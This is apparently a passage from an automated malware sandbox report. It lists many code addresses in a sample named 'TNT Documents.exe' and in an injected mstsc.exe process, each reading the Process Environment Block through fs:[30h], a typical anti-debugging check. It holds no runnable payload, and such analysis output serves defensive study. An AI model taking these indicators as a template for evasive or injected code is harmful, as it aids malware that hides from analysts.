          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0161FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0161FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0161FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01608DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0156D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0156D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0158FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0158FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_016205AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_016205AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01582581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01582581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01582581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01582581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01552D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01552D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01552D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01552D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01552D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01581DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01581DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01581DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015835A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015EC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015EC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0158A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0157746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01611C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01611C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01611C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01611C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01611C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01611C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01611C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01611C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01611C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01611C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01611C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01611C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01611C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01611C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0162740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0162740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0162740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0158BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_016114FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01628CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0156849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01628F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0156EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0156FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0157F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015EFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015EFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0158A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0158A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0158E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0162070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0162070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01554F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01554F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015937F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01568794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01567E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01567E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01567E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01567E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01567E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01567E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0157AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0157AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0157AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0157AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0157AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0161AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0161AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0156766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0158A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0158A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0155C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0155C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0155C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01588E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0160FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01611608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0155E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015836CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01598EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0160FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01628ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015676E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015816E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01620EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01620EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01620EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015EFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055D7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05633540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055DC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055DC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0563A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05688D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0567E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055BAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0567FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0567FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0567FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0567FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05668DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05636DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05636DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05636DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05636DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05636DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05636DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055CD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055CD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_056805AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_056805AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055EFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055EFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055EA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055D746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0564C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0564C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0568740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0568740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0568740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05636C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05636C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05636C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05636C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055EBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05636CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05636CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05636CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_056714FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05688CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05688F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055CEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055CFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055DF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055EA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055EA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0568070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0568070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055EE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0564FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0564FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055B4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055B4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05637794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05637794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05637794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0567AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0567AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055EA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055EA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0566FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055BC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055BC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055BC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05671608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055BE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0566FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05688ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_056346A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05680EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05680EA5 mov eax, dword ptr fs:[00000030h]
